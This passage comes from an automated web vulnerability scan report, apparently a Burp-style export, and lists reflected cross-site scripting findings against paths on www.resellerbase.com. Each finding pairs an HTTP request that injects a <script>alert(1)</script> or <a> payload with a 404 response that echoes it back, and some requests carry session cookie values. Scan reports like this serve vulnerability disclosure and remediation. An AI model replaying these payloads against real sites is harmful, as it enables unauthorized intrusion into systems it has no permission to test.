The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/37/rating.php6cf5e<script>alert(1)</script>34702f2cd0121c68e?id=37&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/rating.php6cf5e<script>alert(1)</script>34702f2cd0121c68e?id=37&rating=5 was not found on this server.</p>
...[SNIP]...

2.2472. http://www.resellerbase.com/detail/37/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ddbd6<script>alert(1)</script>7393d751167 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/rating.php?ddbd6<script>alert(1)</script>7393d751167=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/rating.php?ddbd6<script>alert(1)</script>7393d751167=1 was not found on this server.</p>
...[SNIP]...

2.2473. http://www.resellerbase.com/detail/37/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e68db<script>alert(1)</script>fa22e02323c013df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/37/rating.php/e68db<script>alert(1)</script>fa22e02323c013df?id=37&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/rating.php/e68db<script>alert(1)</script>fa22e02323c013df?id=37&rating=5 was not found on this server.</p>
...[SNIP]...

2.2474. http://www.resellerbase.com/detail/37/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 87b29<script>alert(1)</script>b04d30ae440 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail87b29<script>alert(1)</script>b04d30ae440/37/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail87b29<script>alert(1)</script>b04d30ae440/37/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2475. http://www.resellerbase.com/detail/37/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 787f7<script>alert(1)</script>3e57e7d7957 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37787f7<script>alert(1)</script>3e57e7d7957/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37787f7<script>alert(1)</script>3e57e7d7957/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2476. http://www.resellerbase.com/detail/37/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b9173<script>alert(1)</script>aea45563488 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/search.phpb9173<script>alert(1)</script>aea45563488?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/search.phpb9173<script>alert(1)</script>aea45563488?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2477. http://www.resellerbase.com/detail/37/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/37/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 32263<a>1b95818d01a was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/37/search.php?keyword=search...&Submit3=Search32263<a>1b95818d01a&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/search.php?keyword=search...&Submit3=Search32263<a>1b95818d01a&opt=2 was not found on this server.</p>
...[SNIP]...

2.2478. http://www.resellerbase.com/detail/37/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/37/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 5fbd9<a>d9c2d037916 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/37/search.php?keyword=search...5fbd9<a>d9c2d037916&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/search.php?keyword=search...5fbd9<a>d9c2d037916&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2479. http://www.resellerbase.com/detail/37/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 20b33<script>alert(1)</script>e87d7922952 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/search.php?keyword=search...&Submit3=Search&opt=2&20b33<script>alert(1)</script>e87d7922952=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/search.php?keyword=search...&Submit3=Search&opt=2&20b33<script>alert(1)</script>e87d7922952=1 was not found on this server.</p>
...[SNIP]...

2.2480. http://www.resellerbase.com/detail/37/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/37/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 12e9e<a>9f87681a10a was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/37/search.php?keyword=search...&Submit3=Search&opt=212e9e<a>9f87681a10a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/search.php?keyword=search...&Submit3=Search&opt=212e9e<a>9f87681a10a was not found on this server.</p>
...[SNIP]...

2.2481. http://www.resellerbase.com/detail/37/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a9e18<script>alert(1)</script>fc8c7b79720 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaila9e18<script>alert(1)</script>fc8c7b79720/37/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila9e18<script>alert(1)</script>fc8c7b79720/37/themes/ was not found on this server.</p>
...[SNIP]...

2.2482. http://www.resellerbase.com/detail/37/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f4938<script>alert(1)</script>eebb25e7f60 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37f4938<script>alert(1)</script>eebb25e7f60/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37f4938<script>alert(1)</script>eebb25e7f60/themes/ was not found on this server.</p>
...[SNIP]...

2.2483. http://www.resellerbase.com/detail/37/themes/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload af1e9<script>alert(1)</script>adc2e7ce881 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themesaf1e9<script>alert(1)</script>adc2e7ce881/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.2484. http://www.resellerbase.com/detail/37/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c1e90<script>alert(1)</script>4db247f8e33 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/?c1e90<script>alert(1)</script>4db247f8e33=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/?c1e90<script>alert(1)</script>4db247f8e33=1 was not found on this server.</p>
...[SNIP]...

2.2485. http://www.resellerbase.com/detail/37/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8a88f<script>alert(1)</script>87d2a6d0a65 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail8a88f<script>alert(1)</script>87d2a6d0a65/37/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail8a88f<script>alert(1)</script>87d2a6d0a65/37/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2486. http://www.resellerbase.com/detail/37/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a64f7<script>alert(1)</script>a4013c0cedb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37a64f7<script>alert(1)</script>a4013c0cedb/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37a64f7<script>alert(1)</script>a4013c0cedb/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2487. http://www.resellerbase.com/detail/37/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 33043<script>alert(1)</script>21150f9e4b7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes33043<script>alert(1)</script>21150f9e4b7/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.2488. http://www.resellerbase.com/detail/37/themes/kosmos/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 35248<script>alert(1)</script>a6f64945d6c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos35248<script>alert(1)</script>a6f64945d6c/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos35248<script>alert(1)</script>a6f64945d6c/ was not found on this server.</p>
...[SNIP]...

2.2489. http://www.resellerbase.com/detail/37/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3e83a<script>alert(1)</script>b1840cddc49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos/?3e83a<script>alert(1)</script>b1840cddc49=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.2490. http://www.resellerbase.com/detail/37/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload febae<script>alert(1)</script>68b3231d958 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailfebae<script>alert(1)</script>68b3231d958/37/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailfebae<script>alert(1)</script>68b3231d958/37/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2491. http://www.resellerbase.com/detail/37/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7a2e5<script>alert(1)</script>4bc326ebd5c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/377a2e5<script>alert(1)</script>4bc326ebd5c/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/377a2e5<script>alert(1)</script>4bc326ebd5c/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2492. http://www.resellerbase.com/detail/37/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/

Issue detail

